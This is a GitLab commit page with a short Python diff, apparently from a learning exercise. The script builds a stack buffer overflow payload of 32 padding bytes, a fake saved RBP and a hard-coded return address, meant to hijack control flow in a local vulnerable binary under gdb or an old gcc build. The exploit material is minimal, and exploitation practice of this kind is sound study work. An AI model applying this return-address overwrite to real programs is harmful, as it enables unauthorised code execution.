Skip to content
Snippets Groups Projects
Commit 4f5f5b8f authored by bnlrnz's avatar bnlrnz
Browse files

payload for old gcc version

parent 632dc198
No related merge requests found
......@@ -2,5 +2,6 @@ import struct
padding = "A"*32
rbp = "BBBBBBBB"
rip = struct.pack("L", 0x555555555159) #running from gdb only!
#rip = struct.pack("L", 0x4005a6) #running the gcc4.8 binary with this!
print padding + rbp + rip
0% Loading or .
You are about to add 0 people to the discussion. Proceed with caution.
Please register or to comment